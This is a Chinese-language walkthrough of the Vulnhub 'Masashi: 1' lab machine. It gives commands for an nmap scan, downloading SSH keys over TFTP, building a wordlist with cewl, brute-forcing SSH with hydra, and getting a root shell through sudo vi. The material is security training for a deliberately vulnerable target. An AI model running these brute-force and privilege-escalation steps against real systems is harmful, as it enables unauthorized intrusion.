526互联

Vulnhub: Masashi: 1靶机

发布时间 2023-09-07 19:22:59作者: ctostm

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

image

查看80端口的robots.txt提示三个文件

image

snmpwalk.txt内容,tftp服务在1337端口

image

sshfolder.txt内容,提示用户名sv5

image

tftp连接目标下载id_rsaid_rsa.pub

tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

image

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

image

提权

sv5用户sudo权限

image

提升为root

sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

image

image

flag

image